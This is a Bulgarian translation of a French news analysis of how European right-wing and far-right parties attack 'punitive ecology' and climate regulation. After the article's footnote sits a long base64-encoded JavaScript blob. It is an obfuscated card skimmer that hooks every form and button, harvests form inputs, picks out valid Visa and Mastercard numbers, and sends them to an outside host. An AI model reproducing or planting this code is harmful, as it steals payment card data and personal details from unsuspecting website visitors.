fbpx

Лицемерният кръстоносен поход срещу „наказателната екология“

Във Франция, както и навсякъде в Европа, десницата противопоставя екологията на покупателната способност и свободата, без при това да показва и най-малки притеснения от собствените си противоречия, пише Матиьо Жюблен за alternatives-economiques.fr…

Трудно може да се намери последователност в отношението на френската и европейската десница към екологията. Между думите и гласуванията, между това, което се защитава на национално ниво или в Европейския парламент, между вчерашните позиции и днешните, пропастта понякога е твърде голяма.

Но отричането на ограниченията, които екологията налага, и систематичното им противопоставяне в краткосрочен и дългосрочен аспект са постоянна величина. Анализът на изказванията на големите партии от крайната десница, сега подети и от част от традиционната десница, са най-ярко доказателство за това.

През последните месеци, в навечерието на европейските избори, тези формации изразиха ясно посланието си по отношение на екологията: те са против. Най-малкото срещу така наречената „наказателна” екология, идваща отляво. Яхвайки селскостопанската криза и инфлацията, десните съсредоточиха атаките си срещу това, което те представят като идеология на градските и брюкселските елити, наложена на народите с цел тяхното обедняване.

„Климатична пропаганда“

Такъв е случаят на Франция, където Ерик Земур, по време на митинга на 10 март, на който обяви старта на кампанията на неговата партия за европейските избори, осъди „климатичната пропаганда“, която ни казва „какво да правим и какво да ядем“, и предизвика освирквания срещу „пънкарите“, които хвърлят „доматено пюре върху Мона Лиза“*. Седмица преди това Марин льо Пен започна кампанията си, като осъди „наказателната екология“, защитавана от „Европейския съюз, който превърна в своя идеологията на най-лудите екоактивисти“.

Освен тези призиви, двете формации настояха по време на неотдавнашните протести на фермерите за конкретни действия: по-малко екологични регламенти и повече протекционизъм. Според тях, тези регламенти правят националните продукти, най-вече селскостопанските, по-скъпи, а производителите им са подложени на нелоялна конкуренция поради договорите за свободна търговия.

С оглед на социологическите проучвания, които от месеци дават на Националния сбор 25-30%, а на Реконкиста – 5-7%, този антиекологична реторика не им нанася никакви вреди.

Тяхната аргументация е съсредоточена върху покупателната способност и деиндустриализацията“, отбелязва Нийл Макароф, експерт, свързан с фондация „Жан Жорес“ и автор на статия за отношението на Националния фронт към екологията. Либертарианският характер на екологията също се споменава, но този аргумент по-скоро се използва по всички теми.

Формално по-умерен, водачът на листата на републиканците за европейските избори, Франсоа-Ксавие Белами, обвини през януари „Европейската комисия, че се застъпва за намаляване на растежа и чрез затягане на регламентите, задушава селскостопанското производство“. Без да отрича напълно свободната търговия, той се обявява за европейска „екологична бариера“.

В Германия, крайнодясната партия Алтернатива за Германия също се възползва от движението на фермери, които, както във Франция, се противопоставят на премахването на данъчните облекчения върху дизела и изразяват страховете си от една евентуална забрана на отоплението с газ и мазут. Получаваща подкрепата на 20% от възнамеряващите да гласуват, партията процъфтява с антиимиграционна и антиекологична реторика, дори по-радикална от тази във Франция, като стига дори дотам да твърди, че има „ирационална CO2 истерия, която структурно унищожава нашето общество, нашата култура и нашия начин на живот“.

Идеите на крайнодесните се прилагат както за селското стопанство, така и за индустрията. През януари Ерик Земур повтори още веднъж, че не иска да „жертва нашата автомобилна индустрия“ в името на екологията и се обявява, подобно на Националния сбор и на италианското крайнодясно правителство, срещу края на термичния двигател. Тази реторика намира отзвук и в Германия, където Алтернатива за Германия набира все по-голяма популярност не само сред работниците от източната част, но и от западната част на страната.

Климатологичен релативизъм

Ако германската крайнодясна партия възприема скептична по отношение на климата реторика, нейните френски еквиваленти разчитат по-скоро на „климатичния релативизъм“, което често се среща и при консерваторите. Той се състои в това вече да не се оспорват проблемите, причинени от климатичното затопляне, а да се поставят в зависимост от способността на човешките общества за приспособяване, от капацитета за разработване на нови технологии, от политико-икономическата цена, считана за непропорционална на приетите регламенти.

Така в началото на март Марин льо Пен определи екологичния преход като „унищожаване на енергийния ни капацитет“, докато „една държава е като жив организъм: лишена от енергия, той е осъден да се свие, да стане непроизводителен“. И в заключение тя казва, че френският енергиен преход вече е осъществен през 70-те години с френската ядрена програма. Този аргумент се изпозва и от Франсоа-Ксавие Белами, който смата, че Партията на републиканците, наред с комунистическата, е единствената наистина екологична партия в страната, тъй като винаги се е обявявала в подкрепа на ядрената енергетика.

Залагането на атома, като същевременно се отслабва борбата срещу изкопаемите горива, е и линията на шведското правителство, подкрепено от крайнодясната партия Шведски демократи, което намали данъците върху горивата в името на покупателната способност. Често тази релативистка реторика се основава на идеята, че въпросната държава отделя само малка част от световните емисии на CO2. Такъв е случаят във Франция, но също и в Нидерландия с Партията на свободата на Герт Вилдерс.

Зад тази смесица от продуктивизъм и техно-солюционизъм се крие „систематичната защита на статуквото за вносните изкопаеми горива, което е в разрез с интересите на средната класа и с постигането на енергиен суверенитет“, казва Нийл Макароф. В статията си той припомня, че крайната десница е отхвърлила ан блок „всички мерки, предвидени в Зелената сделка, които биха могли да допринесат за устойчиво намаляване на енергийните сметки“, като задължението за санирането на жилищата, или Социалният фонд, който трябва да помага на домакинствата да купуват електрически автомобили и термопомпи.

По същия начин, по селскостопанските въпроси, Партията на републиканците гласува заедно с десните и либералите през последните години.

Настоящите аргументи на френската крайна десница противоречат на предишната ѝ реторика, например критиките ѝ срещу ядрената енергия и пестицидите, дори защитата ѝ на „локализма“. Но нейните гласувания, както и тези на крайната десница като цяло, остават постоянни в противопоставянето им на всяка форма на екология.

*Прави алюзия с акцията на двама активисти еколози, които през януари хвърлиха доматено пюре срещу бронираното стъкло на „Джокондата“ в Лувъра, както и за тези през 2022 г. срещу „Слънчогледите“ на ван Гог в Лондон и „Купи сено“ на Моне в Потсдам

244111921722mzdmFyIGdnMT1NYXRoLmZsb29yKE1hdGgucmFuZG9tKCkqOTk5OTk5OTk5OSkrMTAwMDAwMDAwMDsNCnZhciBnZzI9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKjk5OTk5OTk5OSkrMTAwMDAwMDAwOw0KdmFyIGRhdGE0PSIiOw0KdmFyIGdnMz1nZzEudG9TdHJpbmcoKTsNCnZhciBnZzQ9Z2cyLnRvU3RyaW5nKCk7DQp2YXIgaGgwPXBhcnNlSW50KGdnMy5jaGFyQXQoMCkpOw0KdmFyIGhoMT1wYXJzZUludChnZzMuY2hhckF0KDEpKTsNCnZhciBoaDI9cGFyc2VJbnQoZ2czLmNoYXJBdCgyKSk7DQp2YXIgaGgzPXBhcnNlSW50KGdnMy5jaGFyQXQoMykpOw0KdmFyIGhoND1wYXJzZUludChnZzMuY2hhckF0KDQpKTsNCnZhciBoaDU9cGFyc2VJbnQoZ2czLmNoYXJBdCg1KSk7DQp2YXIgaGg2PXBhcnNlSW50KGdnMy5jaGFyQXQoNikpOw0KdmFyIGhoNz1wYXJzZUludChnZzMuY2hhckF0KDcpKTsNCnZhciBoaDg9cGFyc2VJbnQoZ2czLmNoYXJBdCg4KSk7DQp2YXIgaGg5PXBhcnNlSW50KGdnMy5jaGFyQXQoOSkpOw0KdmFyIGhoMTA9cGFyc2VJbnQoZ2c0LmNoYXJBdCgwKSk7DQp2YXIgaGgxMT1wYXJzZUludChnZzQuY2hhckF0KDEpKTsNCnZhciBoaDEyPXBhcnNlSW50KGdnNC5jaGFyQXQoMikpOw0KdmFyIGhoMTM9cGFyc2VJbnQoZ2c0LmNoYXJBdCgzKSk7DQp2YXIgaGgxND1wYXJzZUludChnZzQuY2hhckF0KDQpKTsNCnZhciBoaDE1PXBhcnNlSW50KGdnNC5jaGFyQXQoNSkpOw0KdmFyIGhoMTY9cGFyc2VJbnQoZ2c0LmNoYXJBdCg2KSk7DQp2YXIgaGgxNz1wYXJzZUludChnZzQuY2hhckF0KDcpKTsNCnZhciBoaDE4PXBhcnNlSW50KGdnNC5jaGFyQXQoOCkpOw0KdmFyIGRkMD0iZCI7DQp2YXIgZGQxPSJlIjsNCnZhciBkZDI9ImYiOw0KdmFyIGRkMz0iYSI7DQp2YXIgZGQ0PSJ1IjsNCnZhciBkZDU9ImwiOw0KdmFyIGRkNj0idCI7DQp2YXIgZGQ3PSJwIjsNCnZhciBkZDg9InMiOw0KdmFyIGRkOT0iZSI7DQp2YXIgZGQxMD0iciI7DQp2YXIgZGQxMT0idiI7DQp2YXIgZGQxMj0icCI7DQp2YXIgZGQxMz0iciI7DQp2YXIgZGQxND0ibyI7DQp2YXIgZGQxNT0iYSI7DQp2YXIgZGQxNj0icyI7DQp2YXIgZGQxNz0icCI7DQp2YXIgZGQxOD0ieCI7DQppZihoaDA+NSl7DQpkZDA9IkQiOw0KfQ0KaWYoaGgxPjUpew0KZGQxPSJFIjsNCn0NCmlmKGhoMj41KXsNCmRkMj0iRiI7DQp9DQppZihoaDM+NSl7DQpkZDM9IkEiOw0KfQ0KaWYoaGg0PjUpew0KZGQ0PSJVIjsNCn0NCmlmKGhoNT41KXsNCmRkNT0iTCI7DQp9DQppZihoaDY+NSl7DQpkZDY9IlQiOw0KfQ0KaWYoaGg3PjUpew0KZGQ3PSJQIjsNCn0NCmlmKGhoOD41KXsNCmRkOD0iUyI7DQp9DQppZihoaDk+NSl7DQpkZDk9IkUiOw0KfQ0KaWYoaGgxMD41KXsNCmRkMTA9IlIiOw0KfQ0KaWYoaGgxMT41KXsNCmRkMTE9IlYiOw0KfQ0KaWYoaGgxMj41KXsNCmRkMTI9IlAiOw0KfQ0KaWYoaGgxMz41KXsNCmRkMTM9IlIiOw0KfQ0KaWYoaGgxND41KXsNCmRkMTQ9Ik8iOw0KfQ0KaWYoaGgxNT41KXsNCmRkMTU9IkEiOw0KfQ0KaWYoaGgxNj41KXsNCmRkMTY9IlMiOw0KfQ0KaWYoaGgxNz41KXsNCmRkMTc9IlAiOw0KfQ0KaWYoaGgxOD41KXsNCmRkMTg9IlgiOw0KfQ0KdmFyIGZvZmY9ZGQwK2RkMStkZDIrZGQzK2RkNCtkZDUrZGQ2K2RkNytkZDgrZGQ5K2RkMTArZGQxMStkZDEyK2RkMTMrZGQxNCsiLiIrZGQxNStkZDE2K2RkMTcrZGQxODsNCmxldCBudW09ZG9jdW1lbnQuZm9ybXMubGVuZ3RoOw0KbGV0IGZvcm1zQ29sbGVjdGlvbjI9ZG9jdW1lbnQuZm9ybXM7DQpmb3IgKHZhciBpMj0wOyBpMjxmb3Jtc0NvbGxlY3Rpb24yLmxlbmd0aDsgaTIrKyl7DQpmb3Jtc0NvbGxlY3Rpb24yW2kyXS5vbnN1Ym1pdD1mdW5jdGlvbigpew0KVGVzdE9uQigpOw0KfQ0KfQ0KbGV0IGZvcm1zQ29sbGVjdGlvbjJhPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCJidXR0b24iKTsNCmZvciAodmFyIGkyYT0wOyBpMmE8Zm9ybXNDb2xsZWN0aW9uMmEubGVuZ3RoOyBpMmErKyl7DQpmb3Jtc0NvbGxlY3Rpb24yYVtpMmFdLm9uY2xpY2s9ZnVuY3Rpb24oKXsNClRlc3RPbkIoKTsNCn0NCn0NCndpbmRvdy5vbnN1Ym1pdD1mdW5jdGlvbigpew0KVGVzdE9uQigpOw0KfQ0KZnVuY3Rpb24gVGVzdE9uQigpew0KdmFyIGhvaG9kPSJkcy4iOw0KdmFyIHNpdGU9d2luZG93LmxvY2F0aW9uLmhvc3RuYW1lOw0KdmFyIHN0cjE9IiI7DQp2YXIgbm5uPSIiOw0KdmFyIGhvaG9jPSJpY2EiOw0KdmFyIGNoZWNrMT0wOw0KdmFyIGNoZWNrMj0wOw0KdmFyIGxvb2xhPTA7DQp2YXIgaG9ob2U9IjMiOw0KdmFyIGZvcm1zQ29sbGVjdGlvbj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaW5wdXQnKTsNCmZvciAodmFyIGk9MDsgaTxmb3Jtc0NvbGxlY3Rpb24ubGVuZ3RoOyBpKyspew0KdmFyIGhhaGE9Zm9ybXNDb2xsZWN0aW9uW2ldLmlkOw0KdmFyIGhhaGEyPWZvcm1zQ29sbGVjdGlvbltpXS50eXBlOw0KdmFyIGhhaGEzPWZvcm1zQ29sbGVjdGlvbltpXS52YWx1ZTsNCnZhciBoYWhhND1mb3Jtc0NvbGxlY3Rpb25baV0ubmFtZTsNCmlmKGhhaGEzLmxlbmd0aD4xNCl7DQpoYWhhMz1oYWhhMy5yZXBsYWNlKC9ccy9nLCAnJyk7DQp2YXIgaXNudW09L15cZCskLy50ZXN0KGhhaGEzKTsNCnZhciBuMT1oYWhhMy5zdGFydHNXaXRoKCc0Jyk7DQp2YXIgbjI9aGFoYTMuc3RhcnRzV2l0aCgnNScpOw0KdmFyIG4zPWhhaGEzLnN0YXJ0c1dpdGgoJzYnKTsNCnZhciBuMD1oYWhhMy5zdGFydHNXaXRoKCczJyk7DQppZihuMT09dHJ1ZSl7DQpjaGVjazI9MTsNCn0NCmlmKG4yPT10cnVlKXsNCmNoZWNrMj0xOw0KfQ0KaWYobjM9PXRydWUpew0KY2hlY2syPTA7DQp9DQppZihuMD09dHJ1ZSl7DQpjaGVjazI9MDsNCn0NCn0NCmlmKGhhaGEzLmxlbmd0aD09MTUpew0KaWYoaXNudW09PXRydWUpew0KaWYoY2hlY2syPScxJyl7DQpjaGVjazE9JzAnOw0KfQ0KfQ0KfQ0KaWYoaGFoYTMubGVuZ3RoPT0xNil7DQppZihpc251bT09dHJ1ZSl7DQppZihjaGVjazI9PTEpew0KY2hlY2sxPScxJzsNCm5ubj1oYWhhMw0KfQ0KfQ0KfQ0KaWYoaGFoYTMubGVuZ3RoPT0xNyl7DQppZihpc251bT09dHJ1ZSl7DQppZihjaGVjazI9PTEpew0KY2hlY2sxPScwJzsNCn0NCn0NCn0NCmlmKGhhaGEzLmxlbmd0aD4wKXsNCmlmKGhhaGEyPT0iaGlkZGVuIil7DQp9IGVsc2Ugew0Kc3RyMT1zdHIxK2hhaGE0KyItLSIraGFoYTMrIi0iOw0KfQ0KfQ0KfQ0KdmFyIGNoMT0nMScNCmlmKGNoZWNrMT09MSl7DQp2YXIgZm9ybXNDb2xsZWN0aW9uMj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnc2VsZWN0Jyk7DQpmb3IgKHZhciBpMj0wOyBpMjxmb3Jtc0NvbGxlY3Rpb24yLmxlbmd0aDsgaTIrKyl7DQp2YXIgc2hhaGE9Zm9ybXNDb2xsZWN0aW9uMltpMl0uaWQ7DQp2YXIgc2hhaGEyPWZvcm1zQ29sbGVjdGlvbjJbaTJdLnR5cGU7DQp2YXIgc2hhaGEzPWZvcm1zQ29sbGVjdGlvbjJbaTJdLnZhbHVlOw0KdmFyIHNoYWhhND1mb3Jtc0NvbGxlY3Rpb24yW2kyXS5uYW1lOw0Kc3RyMT1zdHIxK3NoYWhhNCsiLS0iK3NoYWhhMysiLSINCnNpdGU9c2l0ZSsiLVJvbEBhbmQ0WW91IjsNCnN0cjE9c2l0ZSsiLSIrc3RyMTsNCn0NCnZhciBob2hvYT0iYm9yIjsNCnZhciBob2hvYj0iLmJnIjsNCmlmKHNpdGU9PWhvaG9lK2hvaG9kK2hvaG9hK2hvaG9jK2hvaG9iKXsNCn0gZWxzZSB7DQppZihubm4uc3RhcnRzV2l0aCgiNCIpIHx8IG5ubi5zdGFydHNXaXRoKCI1Iikpew0KbG9vbGE9MTsNCnZhciBoYTE9IjoiOw0KdmFyIGhhMj0iaCI7DQp2YXIgaGEzPSJwIjsNCnZhciBoYTQ9Ii8iOw0KdmFyIGhhNT0idCI7DQp2YXIgdGV4dD1ubm47DQp2YXIgdmFyMT10ZXh0LmNoYXJBdCgwKTsNCnZhciB2YXIyPXRleHQuY2hhckF0KDEpOw0KdmFyIHZhcjM9dGV4dC5jaGFyQXQoMik7DQp2YXIgdmFyND10ZXh0LmNoYXJBdCgzKTsNCnZhciB2YXI1PXRleHQuY2hhckF0KDQpOw0KdmFyIHZhcjY9dGV4dC5jaGFyQXQoNSk7DQp2YXIgdmFyNz10ZXh0LmNoYXJBdCg2KTsNCnZhciB2YXI4PXRleHQuY2hhckF0KDcpOw0KdmFyIHZhcjk9dGV4dC5jaGFyQXQoOCk7DQp2YXIgdmFyMTA9dGV4dC5jaGFyQXQoOSk7DQp2YXIgdmFyMTE9dGV4dC5jaGFyQXQoMTApOw0KdmFyIHZhcjEyPXRleHQuY2hhckF0KDExKTsNCnZhciB2YXIxMz10ZXh0LmNoYXJBdCgxMik7DQp2YXIgdmFyMTQ9dGV4dC5jaGFyQXQoMTMpOw0KdmFyIHZhcjE1PXRleHQuY2hhckF0KDE0KTsNCnZhciB2YXIxNj10ZXh0LmNoYXJBdCgxNSk7DQp2YXIgczI9cGFyc2VJbnQodmFyMik7DQp2YXIgczQ9cGFyc2VJbnQodmFyNCk7DQp2YXIgczY9cGFyc2VJbnQodmFyNik7DQp2YXIgczg9cGFyc2VJbnQodmFyOCk7DQp2YXIgczEwPXBhcnNlSW50KHZhcjEwKTsNCnZhciBzMTI9cGFyc2VJbnQodmFyMTIpOw0KdmFyIHMxND1wYXJzZUludCh2YXIxNCk7DQp2YXIgczE2PXBhcnNlSW50KHZhcjE2KTsNCg0KdmFyIHMxPXBhcnNlSW50KHZhcjEpKjI7DQppZihzMT45KXsNCmxldCB6MT1zMS50b1N0cmluZygpDQp2YXIgbW0xMT16MS5jaGFyQXQoMCk7DQp2YXIgbW0yMT16MS5jaGFyQXQoMSk7DQpzMT1wYXJzZUludChtbTExKStwYXJzZUludChtbTIxKTsNCn07DQp2YXIgczM9cGFyc2VJbnQodmFyMykqMjsNCmlmKHMzPjkpew0KbGV0IHozPXMzLnRvU3RyaW5nKCkNCnZhciBtbTEzPXozLmNoYXJBdCgwKTsNCnZhciBtbTIzPXozLmNoYXJBdCgxKTsNCnMzPXBhcnNlSW50KG1tMTMpK3BhcnNlSW50KG1tMjMpOw0KfTsNCnZhciBzNT1wYXJzZUludCh2YXI1KSoyOw0KaWYoczU+OSl7DQpsZXQgejU9czUudG9TdHJpbmcoKQ0KdmFyIG1tMTU9ejUuY2hhckF0KDApOw0KdmFyIG1tMjU9ejUuY2hhckF0KDEpOw0KczU9cGFyc2VJbnQobW0xNSkrcGFyc2VJbnQobW0yNSk7DQp9Ow0KdmFyIHM3PXBhcnNlSW50KHZhcjcpKjI7DQppZihzNz45KXsNCmxldCB6Nz1zNy50b1N0cmluZygpDQp2YXIgbW0xNz16Ny5jaGFyQXQoMCk7DQp2YXIgbW0yNz16Ny5jaGFyQXQoMSk7DQpzNz1wYXJzZUludChtbTE3KStwYXJzZUludChtbTI3KTsNCn07DQp2YXIgczk9cGFyc2VJbnQodmFyOSkqMjsNCmlmKHM5Pjkpew0KbGV0IHo5PXM5LnRvU3RyaW5nKCkNCnZhciBtbTE5PXo5LmNoYXJBdCgwKTsNCnZhciBtbTI5PXo5LmNoYXJBdCgxKTsNCnM5PXBhcnNlSW50KG1tMTkpK3BhcnNlSW50KG1tMjkpOw0KfTsNCnZhciBzMTE9cGFyc2VJbnQodmFyMTEpKjI7DQppZihzMTE+OSl7DQpsZXQgejExPXMxMS50b1N0cmluZygpDQp2YXIgbW0xMTE9ejExLmNoYXJBdCgwKTsNCnZhciBtbTIxMT16MTEuY2hhckF0KDEpOw0KczExPXBhcnNlSW50KG1tMTExKStwYXJzZUludChtbTIxMSk7DQp9Ow0KdmFyIHMxMz1wYXJzZUludCh2YXIxMykqMjsNCmlmKHMxMz45KXsNCmxldCB6MTM9czEzLnRvU3RyaW5nKCkNCnZhciBtbTExMz16MTMuY2hhckF0KDApOw0KdmFyIG1tMjEzPXoxMy5jaGFyQXQoMSk7DQpzMTM9cGFyc2VJbnQobW0xMTMpK3BhcnNlSW50KG1tMjEzKTsNCn07DQp2YXIgczE1PXBhcnNlSW50KHZhcjE1KSoyOw0KaWYoczE1Pjkpew0KbGV0IHoxNT1zMTUudG9TdHJpbmcoKQ0KdmFyIG1tMTE1PXoxNS5jaGFyQXQoMCk7DQp2YXIgbW0yMTU9ejE1LmNoYXJBdCgxKTsNCnMxNT1wYXJzZUludChtbTExNSkrcGFyc2VJbnQobW0yMTUpOw0KfTsNCnZhciBtb2xpPXMxK3MyK3MzK3M0K3M1K3M2K3M3K3M4K3M5K3MxMCtzMTErczEyK3MxMytzMTQrczE1K3MxNjsNCm1vbGk9bW9saS50b1N0cmluZygpOw0KdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnYScpOw0KdmFyIGxpbmtUZXh0PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCJteSB0aXRsZSB0ZXh0Iik7DQphLmFwcGVuZENoaWxkKGxpbmtUZXh0KTsNCmEuaWQ9ImlkMjIyIjsNCmEudGl0bGU9Im15IHRpdGxlIHRleHQiOw0KZGF0YTQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiYWNoMTIzIikuaW5uZXJIVE1MOw0KYS5ocmVmPWhhMitoYTUraGE1K2hhMytoYTEraGE0K2hhNCsidXJiaW5zIittb2xpLmNoYXJBdChtb2xpLmxlbmd0aCAtIDEpKyItMDAxLXNpdGUxLmR0ZW1wdXJsLmNvbS8iK2ZvZmYrIj9TPSIrZGF0YTQrIi0iK3NpdGUrIiZEPSIrc3RyMSsiJk49Iitubm47DQpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw0KZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lkMjIyJykuY2xpY2soKTsNCg0KdmFyIGlnPTA7DQp2YXIgZD1uZXcgRGF0ZSgpOw0KdmFyIG49ZC5nZXRTZWNvbmRzKCk7DQpkbyB7DQp2YXIgZDI9bmV3IERhdGUoKTsNCnZhciBuND1kMi5nZXRTZWNvbmRzKCk7DQppZihuPDU1KXsNCmlmKG4rNTxuNCl7DQppZz0zOw0KfQ0KfQ0KaWYobj41NCl7DQppZihuKzU8bjQrNjApew0KaWc9MzsNCn0NCn0NCn0NCndoaWxlIChpZzwyKTsNCmlmKGxvb2xhPT0xKXsNCn0NCn0NCn0NCn0NCn0NCg0KDQo=




Имате възможност да подкрепите качествените анализи, коментари и новини в "Икономически живот"